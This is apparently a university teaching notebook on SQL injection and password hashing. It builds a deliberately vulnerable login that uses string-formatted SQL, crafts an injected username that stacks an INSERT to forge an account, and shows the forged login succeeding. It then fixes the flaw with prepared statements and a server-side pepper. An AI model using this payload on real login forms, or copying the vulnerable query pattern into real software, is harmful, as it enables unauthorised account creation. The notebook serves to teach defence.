# SQL Injection and Password Security

In this notebook, we show how in a simple scenario SQL injection can be used to forge user accounts for a website that does not offer registrations for new users. The notebook uses some code from [this blog post](https://www.vitoshacademy.com/hashing-passwords-in-python/) on how to hash passwords in Python by Alessandro Molina.

Copyright Marcel Maltry & Jens Dittrich, [Big Data Analytics Group](https://bigdata.uni-saarland.de/), [CC-BY-SA](https://creativecommons.org/licenses/by-sa/4.0/legalcode)

# Setup

We start by defining two functions for hashing passwords and verifying given passwords against a hash.

`hash_password()` first generates a random `salt` string consisting of 64 characters. We then compute the hash `pwdhash` of the provided password and salt using [`scrypt`](https://bitbucket.org/mhallin/py-scrypt/src/default/), a state of the art cryptographic hash function. We use the randomly generated `salt` since the same passwords will later have different hash values because it is very unlikely that their hash was created using the same salt. Finally, `hash_password()` returns both `salt` and the password hash `pwdhash` since we can only check a plain password against `pwdhash` if we also have access to the `salt` that was used to compute the hash.

`verify_password()` takes the hashed password `pwdhash`, the `salt` used for hashing, and a plain text password `pwdcheck` that should be verified. It first computes the hash `pwdcheckhash` of the plain password and the salt and then compares it against `pwdhash`. If both match, we assume the password to be correct.

Below we provide implementations for both `hash_password()` and `verify_password()` along with a simple `unittest` to check whether the functions work as intended.

In [1]:
import hashlib, scrypt, binascii, os

def hash_password(password):
    # generate salt from 60 byte random string
    salt = hashlib.sha256(os.urandom(60)).hexdigest()
    
    # hash password, salt with scrypt and convert to ascii
    pwdhash = binascii.hexlify(scrypt.hash(password, salt)).decode()
    
    return pwdhash, salt

def verify_password(pwdhash, salt, pwdcheck):
    # hash pwdcheck, salt with scypt and convert to ascii
    pwdcheckhash = binascii.hexlify(scrypt.hash(pwdcheck, salt)).decode()
    
    # compare pwdcheckhash with pwdhash
    return pwdcheckhash == pwdhash

In [2]:
import unittest

class TestPwHash(unittest.TestCase):

    def test_correct(self):
        pwd = 'S0m3Stup1dP4ssw0rd?'
        pwdhash, salt = hash_password(pwd)
        self.assertTrue(verify_password(pwdhash, salt, pwd))
       
        pwd = 'Y3tAn0th3rP4ssw0rd ¯\_(ツ)_/¯'
        pwdhash, salt = hash_password(pwd)
        self.assertTrue(verify_password(pwdhash, salt, pwd))

    def test_incorrect(self):
        pwd = 'S0m3Stup1dP4ssw0rd?'
        incorrectpw = 'Bruteforcegeneratedpw'
        pwdhash, salt = hash_password(pwd)
        self.assertFalse(verify_password(pwdhash, salt, incorrectpw))
        
        pwd = 'Y3tAn0th3rP4ssw0rd ¯\_(ツ)_/¯'
        incorrectpw = 'Brutforcing all day!'
        pwdhash, salt = hash_password(pwd)
        self.assertFalse(verify_password(pwdhash, salt, incorrectpw))
        
## Run the unit test without shutting down the jupyter kernel
unittest.main(argv=['ignored', '-v'], verbosity=2, exit=False)

test_correct (__main__.TestPwHash) ... ok
test_incorrect (__main__.TestPwHash) ... ok

----------------------------------------------------------------------
Ran 2 tests in 0.329s

OK


<unittest.main.TestProgram at 0x7fc5fc24be80>

We then create a table for example user accounts with the following attributes:
* `id`: A automatically generated id of the user account,
* `username`: A unique username of the user account,
* `pwdhash`: The hash computed from the user porvided password and salt,
* `salt`: The salt used for hashing the password.

We populate the table with some example tuples.

**Note**: This notebook is supposed to showcase the risk of *SQL injection* in a realisitic setting. SQL injection is independent of how user credentials are stored (plain text, hashed, hashed and salted, ...).

In [3]:
import psycopg

dsn = 'dbname=postgres user=postgres host=/var/run/postgresql/'  # host may be /tmp/ on other systems

uname_pw = [('immanuel','ThisIsImmi'),
            ('joris', 'bestpwintheworld.'),
            ('kai', 'secretstr1ng'),
            ('felix', 'gueswaht?'),
            ('lukas', 'youll_never_know'),
            ('marcel', 's3cby0psc')]

def init_db(dsn):
    
    with psycopg.connect(dsn) as conn:
        
        # Open a cursor to perform database operations
        with conn.cursor() as cur:

            # Drop table if existing
            cur.execute("DROP TABLE IF EXISTS users;")

            # Create accounts table
            cur.execute("""CREATE TABLE users
                          (id SERIAL PRIMARY KEY,
                           username varchar(42) UNIQUE,
                           pwdhash char(128),
                           salt char(64));""")

            # Insert sample data into accounts table
            cur.executemany("""INSERT INTO users(username, pwdhash, salt) VALUES (%s, %s, %s);""",
                            ((u, *hash_password(p)) for u, p in uname_pw))

conn = psycopg.connect(dsn)
conn.autocommit = True

init_db(dsn)

# Insecure Login

We first implement an insecure login routine `insec_login()` that does not sanitize the user provided input. First, we send a query to the database that retrieves the `pwdhash` and `salt` for the provided username. If there is no record, the user does not exist. Then, it is verified that the password provided is correct. If so, we return `True` otherwise, we know that username and password do not match.

Note that the query that is sent to the database to request `pwdhash` and `salt` is created by blindly inserting the user provided username into a string query template, and thus being vulnerable to SQL injection as is shown next.

In [4]:
class UserNotFoundException(Exception):
    """User was not found in database."""
    pass

class UserAndPasswordMismatchException(Exception):
    """User and password do not match."""
    pass

def insec_login(username, password, debug=False, verbose=True):
    # open cursor to perform db operation
    cur = conn.cursor()
    
    # retrieve pwdhash and salt from db
    # the following line with a string concat is the problem
    # this enables SQL injection:
    sql_query = f"SELECT pwdhash, salt FROM users WHERE username=\'{username}\';" 
    if verbose:
        print(f"We constructed the following SQL-query:\n{sql_query}")
    cur.execute(sql_query)
    if debug:
        print(cur.query)
    if cur.rowcount < 1:
        raise UserNotFoundException
    (pwdhash, salt) = cur.fetchone()
    if verbose:
        print(f"The SQL-query retrieved:\npwdhash:{pwdhash}\nsalt:{salt}")
    cur.close()
    
    # check pwd
    if not verify_password(pwdhash, salt, password):
        raise UserAndPasswordMismatchException
    
    # login successful
    return True

We will be able to login, if we provide a username and password that are present in the database.

In [5]:
# successful login
print(f"Login successful: {insec_login('joris', 'bestpwintheworld.')}")

We constructed the following SQL-query:
SELECT pwdhash, salt FROM users WHERE username='joris';
The SQL-query retrieved:
pwdhash:0c569a501423d0a89c905ba4e26d2c6ebe31ae39e375c362c9fd4fd4ec290eed26532428673f0acd53362ca47f685f37fa01ed42dc995e852a1cbeed758a9b0f
salt:25d27fe1af545e96f6986567915672b6105f448fc3d31bc9bc69f37b5bbef4be
Login successful: True


Next, we want to show that `insec_login()` is vulnerable to SQL injection.

Assume that we are an attacker who wants to get access to the system but does not have a user account. Further assume, that accounts can only be created by the database administrator. We can exploit that the insecure login sends query input directly to the database without sanatizing it. Our exploit works in three steps:
1. We choose a username and plain text password with which we want to be able to log in later.
2. We choose salt and hash our plain password with the it.
3. We compose a string that we provide as username to the database that will generate a useraccount for us.

The last step consists of three parts:
1. We close the ticks in which the login routine usually inserts the username and complete the query (`';`). This this will cause the login attempt to fail but we only care about creating a user account for now.
2. We appen the `INSERT` statement that puts our user account with `username`, `pwdhash`, and `salt` into the database (`INSERT INTO user(username, pwdhash, salt) VALUE ...`).
3. We do not know how the query template ends so any remaning stuff will be commented out to have a syntactically correct query (`--`).

In the end, we print the `evil_string` that should be provided as username on login.

In [6]:
# Choose attacker's username and password
evil_username = 'student'
evil_password = 'evil_pwd'

def build_evil_string(evil_username, evil_password):

    # Compute attacker's pwdhash and salt
    evil_salt = '0'*64
    evil_pwdhash = binascii.hexlify(scrypt.hash(evil_password, evil_salt)).decode()

    # Build sql injection string
    evil_string = f"\'; "\
                  f"INSERT INTO users(username, pwdhash, salt) VALUES"\
                  f"(\'{evil_username}\', \'{evil_pwdhash}\', \'{evil_salt}\');"\
                  f" --"
    
    return evil_string


evil_string = build_evil_string(evil_username, evil_password)
print(f"Insert this as username on login:\n{evil_string}")

Insert this as username on login:
'; INSERT INTO users(username, pwdhash, salt) VALUES('student', 'ce65df4add0866ebef7969a3522734dad70730244e78d0c01b4d5018b6de417d42c8a9b1e3fdf994f5e983fd7fd35bd3c6fa4b771e51fe0b697023b8a6a93047', '0000000000000000000000000000000000000000000000000000000000000000'); --


The next cell will ask us for a username and password and then try to log in with whatever we provided. If we now provide the `evil_string` as username and anything as password, the login will fail but a username with the credentials from above is created.

In [7]:
username = input("Username:")
password = input("Password:")

try:
    insec_login(username, password)
except Exception:
    print("Error occurred during login.")

Username:'; INSERT INTO users(username, pwdhash, salt) VALUES('student', 'ce65df4add0866ebef7969a3522734dad70730244e78d0c01b4d5018b6de417d42c8a9b1e3fdf994f5e983fd7fd35bd3c6fa4b771e51fe0b697023b8a6a93047', '0000000000000000000000000000000000000000000000000000000000000000'); --
Password:test
We constructed the following SQL-query:
SELECT pwdhash, salt FROM users WHERE username=''; INSERT INTO users(username, pwdhash, salt) VALUES('student', 'ce65df4add0866ebef7969a3522734dad70730244e78d0c01b4d5018b6de417d42c8a9b1e3fdf994f5e983fd7fd35bd3c6fa4b771e51fe0b697023b8a6a93047', '0000000000000000000000000000000000000000000000000000000000000000'); --';
Error occurred during login.


We are now able to login with the forged account from above.

In [8]:
print(f"Login successful: {insec_login(evil_username, evil_password)}")

We constructed the following SQL-query:
SELECT pwdhash, salt FROM users WHERE username='student';
The SQL-query retrieved:
pwdhash:ce65df4add0866ebef7969a3522734dad70730244e78d0c01b4d5018b6de417d42c8a9b1e3fdf994f5e983fd7fd35bd3c6fa4b771e51fe0b697023b8a6a93047
salt:0000000000000000000000000000000000000000000000000000000000000000
Login successful: True


# Prevent Attack 

There are two ways to prevent this specific type of attack. We can either define a more secure login function that makes use of prepared statements or we can add a bit of complexity to the hashing process of the passwords ([salt+pepper](https://security.stackexchange.com/a/3289)). We will showcase both solutions in the following. Ideally, we implement both.


## Secure Login with Prepared Statement

In the login procedure above, the attacker makes use of the fact that the parameter `username` is not evaluated semantically. The system just assumes that it is valid and inserts it as username in prepared SQL query. The attack can be avoided if we make sure that the database interprets the entire `username` as string and we separate the SQL code from the input data.

Prepared statements are explained in more detail in the [SQL Injection](https://github.com/BigDataAnalyticsGroup/bigdataengineering/blob/master/SQL%20Injection.ipynb) notebook.

Below, we define a secure login procedure using a prepared statement.

In [9]:
def sec_login(uname, pwd, debug=False):
    # open cursor to perform db operation
    cur = conn.cursor()
    
    # retrieve pwdhash and salt from db with sanitized query
    cur.execute("SELECT pwdhash, salt FROM users WHERE username=%s;", (uname,))
    if debug:
        print(cur.query)
    if cur.rowcount < 1:
        raise Exception
    (pwdhash, salt) = cur.fetchone()
    cur.close()
    
    # check pwd
    if not verify_password(pwdhash, salt, pwd):
        raise Exception
    
    # login successful
    return True

Existing users can still login without any problem.

In [10]:
# Successful login
try:
    print(f"Login successful: {sec_login('immanuel', 'ThisIsImmi')}")
except Exception:
    print("It did not work.")

Login successful: True


We can now try the same attack from above with a new username.

In [11]:
evil_username = 'student2'
evil_password = 'who needs security, right?'

evil_string = build_evil_string(evil_username, evil_password)
print(f"Insert this as username on login:\n{evil_string}")

Insert this as username on login:
'; INSERT INTO users(username, pwdhash, salt) VALUES('student2', '59d5f8185ff7ebb328afdaa4a57861a8bcd3b42a01fd1b493b535bf3467dcb8aabffc63f427abf9c5ce87bcc2518d34facd192e9340173c0e5f96638bc8156b0', '0000000000000000000000000000000000000000000000000000000000000000'); --


In [12]:
uname = input("Username:")
pwd = input("Password:")

try:
    sec_login(uname, pwd)
except Exception:
    print("Error occurred during login.")   

Username:'; INSERT INTO users(username, pwdhash, salt) VALUES('student2', '59d5f8185ff7ebb328afdaa4a57861a8bcd3b42a01fd1b493b535bf3467dcb8aabffc63f427abf9c5ce87bcc2518d34facd192e9340173c0e5f96638bc8156b0', '0000000000000000000000000000000000000000000000000000000000000000'); --
Password:test
Error occurred during login.


Since the user input was properly separated from the SQL code the insert part was not executed and, thus, no new user account was created. Therefore, logging in fails.

In [13]:
try:
    print(f"Login successful: {sec_login(evil_username, evil_password)}")
except Exception:
    print("It did not work.")

It did not work.


## Hashing Passwords with Salt and Pepper

The attack from above works because we are able to insert our own salt into the database and, thus, when checking for the correctness of a password during login, the system uses our salt to compute the hash that is compared against the one we inserted into the database.

The attack can be avoided by adding a secret that is only known on the server-side, called pepper. Instead of computing the hash like

```python
scrypt.hash(password, salt)
```

we introduce a secret string `pepper` that is used for computing the hash like

```python
scrypt.hash(password, salt+pepper)
```

The secret string `pepper` is only known to the server. This implies that when using the insecure login procedure, we are still able to insert new user accounts into the database. However, since we do not know the secret `pepper`, the hash we compute and insert will not match the hash that the server computes when verifying the user provided password upon loggin in.